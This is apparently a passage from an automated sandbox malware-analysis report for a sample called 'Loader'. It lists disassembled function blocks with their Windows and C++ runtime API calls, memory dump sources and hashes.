                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1423051803-0
                                                                                                  • Opcode ID: 54d75b4f3754a3723fb12adef2dba45e19932529ea1e7f28ae67128e6c6e4d28
                                                                                                  • Instruction ID: feea670c41c1c43a184aee5dda77e098cb3f219aa04ed9ccd9bcf52558caff58
                                                                                                  • Opcode Fuzzy Hash: 54d75b4f3754a3723fb12adef2dba45e19932529ea1e7f28ae67128e6c6e4d28
                                                                                                  • Instruction Fuzzy Hash: 3451B1B6602206AFEB21AF65EC51FBB36ADEF84710F150528FD04E6151EB75DC108FA2
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0092F0F5
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00928FD8), ref: 0092F114
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00928FD8,0092A490,?), ref: 0092F142
                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(00928FD8,0092A490,?), ref: 0092F19D
                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(00928FD8,0092A490,?), ref: 0092F1B4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 66001078-0
                                                                                                  • Opcode ID: 5a1e92711aa70f57d82eb04563303efe76d1ff6a00f7162b61cc5bf1940d85ef
                                                                                                  • Instruction ID: 30c7f73e37054134540e3e99747577cec98e8e08b0b17e292ab4a1acc9d52b8a
                                                                                                  • Opcode Fuzzy Hash: 5a1e92711aa70f57d82eb04563303efe76d1ff6a00f7162b61cc5bf1940d85ef
                                                                                                  • Instruction Fuzzy Hash: 84417C3150872ADFCB24DF65E8A096AB3F9FF04311BA04A39D456C794AD730F9A4CB50
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00923E45
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00923E5F
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00923E80
                                                                                                  • __Getctype.LIBCPMT ref: 00923F32
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00923F78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                  • String ID:
                                                                                                  • API String ID: 3087743877-0
                                                                                                  • Opcode ID: b6a7b6c56a93ae70ba3e2822e7d578fb2382cc4d3863585bc852a6dab498b05c
                                                                                                  • Instruction ID: 166dbd62108c59295251ec386132e65fcc1fba1655644ba6d9e3ba2dc6b19e68
                                                                                                  • Opcode Fuzzy Hash: b6a7b6c56a93ae70ba3e2822e7d578fb2382cc4d3863585bc852a6dab498b05c
                                                                                                  • Instruction Fuzzy Hash: 06418DB1D003248FCB10DF95E841BAEBBB5FF88710F048119D8156B399DB38AA05CF91
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 0092D5B9
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0092D5C3
                                                                                                  • int.LIBCPMT ref: 0092D5DA
                                                                                                    • Part of subcall function 0092C2D5: std::_Lockit::_Lockit.LIBCPMT ref: 0092C2E6
                                                                                                    • Part of subcall function 0092C2D5: std::_Lockit::~_Lockit.LIBCPMT ref: 0092C300
                                                                                                  • codecvt.LIBCPMT ref: 0092D5FD
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0092D634
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                  • String ID:
                                                                                                  • API String ID: 3716348337-0
                                                                                                  • Opcode ID: 61ebc0ef329aaf863e9ca8e765bf05a56a2fad699ca2c6528d6ab2536e612a42
                                                                                                  • Instruction ID: 84917222c3e65a791201ff60ae7cc1841bbbb28a55283fc613d7a238adcb2c12
                                                                                                  • Opcode Fuzzy Hash: 61ebc0ef329aaf863e9ca8e765bf05a56a2fad699ca2c6528d6ab2536e612a42
                                                                                                  • Instruction Fuzzy Hash: 8201D2729012398FCB05EBA4E951BAD77B5AFC0320F240419F8146B289CF789E04CB81
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 0092AF7E
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0092AF89
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0092AFF7
                                                                                                    • Part of subcall function 0092AE4A: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0092AE62
                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 0092AFA4
                                                                                                  • _Yarn.LIBCPMT ref: 0092AFBA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1088826258-0
                                                                                                  • Opcode ID: 09170029a6bdc28f1b943d813a03f160616c4fe7d6c3a3d48fc2afb7e06220f0
                                                                                                  • Instruction ID: 2a588a339e476fb1243ebeb69226fb67b6f7ee78143af03e9ab64667fa32c3c4
                                                                                                  • Opcode Fuzzy Hash: 09170029a6bdc28f1b943d813a03f160616c4fe7d6c3a3d48fc2afb7e06220f0
                                                                                                  • Instruction Fuzzy Hash: 82017CB66057219FCB06EB21E862A7D7BA6FFC4351B144019E80557385CF38AE42DF82
                                                                                                  APIs
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 0092B8F9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DecrefRef_count_base::_std::_
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 1456557076-2671469338
                                                                                                  • Opcode ID: b7df0bb7ea12cd873e3d481aa180d1886361d34c334b6f0d1578f4f9c752cdec
                                                                                                  • Instruction ID: 4a03610e708f8d72a8d92c28becba04c641be7a0d40e126bebff969fc77158e8
                                                                                                  • Opcode Fuzzy Hash: b7df0bb7ea12cd873e3d481aa180d1886361d34c334b6f0d1578f4f9c752cdec
                                                                                                  • Instruction Fuzzy Hash: 0421F579804629EFCF389F64E446BAEB7ECEF40324F148A1EE405D7294D7349A80CB90
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00946ACC,00000000,?,0095D2B0,?,?,?,00946A03,00000004,InitializeCriticalSectionEx,00950D44,00950D4C), ref: 00946A3D
                                                                                                  • GetLastError.KERNEL32(?,00946ACC,00000000,?,0095D2B0,?,?,?,00946A03,00000004,InitializeCriticalSectionEx,00950D44,00950D4C,00000000,?,0093BCAC), ref: 00946A47
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00946A6F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: 373eb3cedfaa3fdb1344077f46a5733d43bdc3fd628fc09ff3a2f54042760871
                                                                                                  • Instruction ID: 4e94a43c4853497a0a71caa58de0176d864b43425b89cd4a38acf35f8eed297b
                                                                                                  • Opcode Fuzzy Hash: 373eb3cedfaa3fdb1344077f46a5733d43bdc3fd628fc09ff3a2f54042760871
                                                                                                  • Instruction Fuzzy Hash: 1AE01A70384704BAEB205FA2EC06F393B689B51B46F908420FA4CA94E0DB62E8149646
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(F84A4DD6,00000000,00000000,?), ref: 009440F1
                                                                                                    • Part of subcall function 0093C111: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0093D985,?,00000000,-00000008), ref: 0093C172
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00944343
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00944389
                                                                                                  • GetLastError.KERNEL32 ref: 0094442C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: d1d2cb5556cdd1ac14ef089d8ae513b1225f47431f611b822902a99f55ac23d6
                                                                                                  • Instruction ID: 29e698ffeec422e8c9c11f0e510fbf735a03d6730ff34f52927a7a5027d8e061
                                                                                                  • Opcode Fuzzy Hash: d1d2cb5556cdd1ac14ef089d8ae513b1225f47431f611b822902a99f55ac23d6
                                                                                                  • Instruction Fuzzy Hash: FED16975E052589FCF15CFE9C880AEDBBB8FF49304F24452AE856EB262D630A941CF50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: 2b7640a4afc161ed7654b4788e6917e17170e62c78812564753e6760cae1ff57
                                                                                                  • Instruction ID: b7e1672910fe4c7856822174728ff05f32253cb9cd9893ea26f80887197e1db2
                                                                                                  • Opcode Fuzzy Hash: 2b7640a4afc161ed7654b4788e6917e17170e62c78812564753e6760cae1ff57
                                                                                                  • Instruction Fuzzy Hash: 5A51E272A017069FDB28CF55E865BAA77A8EF80710F14452DEE06876A2D735EC40CF94
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00927465
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00927535
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00927543
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00927551
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2261580123-0
                                                                                                  • Opcode ID: f9969e517fe60e1855c186065a9aa39a5ff39f438a9fe7ffe1c098cb9cc5ce8b
                                                                                                  • Instruction ID: 63109fb9ffb9a5265cf0e10427f1bb3af95a625028f1f2ba920fa1c1398b861e
                                                                                                  • Opcode Fuzzy Hash: f9969e517fe60e1855c186065a9aa39a5ff39f438a9fe7ffe1c098cb9cc5ce8b
                                                                                                  • Instruction Fuzzy Hash: CE411CB19043258BDB20EFA4E841B5BF7B9FF84320F144539E45A576A5E734E801CB91
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00924635
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00924652
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00924673
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00924720
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                  • String ID:
                                                                                                  • API String ID: 593203224-0
                                                                                                  • Opcode ID: e504a97ccfe2f7387603af238270422223536a050316f25dfab46189bb2bdae3
                                                                                                  • Instruction ID: 30dff4646f9412ac95e8b7a56baa57f98035ca262a0846d5f6e2e719c3500ea6
                                                                                                  • Opcode Fuzzy Hash: e504a97ccfe2f7387603af238270422223536a050316f25dfab46189bb2bdae3
                                                                                                  • Instruction Fuzzy Hash: 49415AB5D003298FCB10DF95E884BAEBBB9FB49321F044619E8156B395D734AD44CFA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C111: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0093D985,?,00000000,-00000008), ref: 0093C172
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00941F1A
                                                                                                  • __dosmaperr.LIBCMT ref: 00941F21
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00941F5B
                                                                                                  • __dosmaperr.LIBCMT ref: 00941F62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: ac4df6edaa82de39ce3d7da3b6567db80b08d56a3c9126bbd4d599840832fcfe
                                                                                                  • Instruction ID: ed71c90dcf9bf40e3cc8271f4f86fc07716585dd1c0ead68118e0e7e13aea541
                                                                                                  • Opcode Fuzzy Hash: ac4df6edaa82de39ce3d7da3b6567db80b08d56a3c9126bbd4d599840832fcfe
                                                                                                  • Instruction Fuzzy Hash: 4621D771604205AFCB20AF76CC81D2BF7ADFF44364B108559FC6597150DB31EC818B90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c8c8078205903895fd948f5d48cac530d7462cc1557f1b72a281a16a68282f55
                                                                                                  • Instruction ID: 33387d79178d9c3ad1c586126cf16f650e367a39d1042aebe00a7adf46aad2ec
                                                                                                  • Opcode Fuzzy Hash: c8c8078205903895fd948f5d48cac530d7462cc1557f1b72a281a16a68282f55
                                                                                                  • Instruction Fuzzy Hash: 6421A571604215AFDB20AF75DC81A6BB7ADEF85364F104915F96AD71A1EB31EC00CFA0
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 009432B6
                                                                                                    • Part of subcall function 0093C111: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0093D985,?,00000000,-00000008), ref: 0093C172
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009432EE
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0094330E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 158306478-0
                                                                                                  • Opcode ID: 34cb7164d06627576c91ff460d8740276f1df23e351b3a9e0aebe60299b88697
                                                                                                  • Instruction ID: 41a4595ecfc9e720995d3f6e2b072a6fea47703926f2ccbf0625e367ded0dea8
                                                                                                  • Opcode Fuzzy Hash: 34cb7164d06627576c91ff460d8740276f1df23e351b3a9e0aebe60299b88697
                                                                                                  • Instruction Fuzzy Hash: C11145F16056157FAB212BB29C8ADBF7E6CCED6399B904424F641D2101FF24EE009BB1
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 0092E989
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0092E993
                                                                                                  • int.LIBCPMT ref: 0092E9AA
                                                                                                    • Part of subcall function 0092C2D5: std::_Lockit::_Lockit.LIBCPMT ref: 0092C2E6
                                                                                                    • Part of subcall function 0092C2D5: std::_Lockit::~_Lockit.LIBCPMT ref: 0092C300
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0092EA04
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
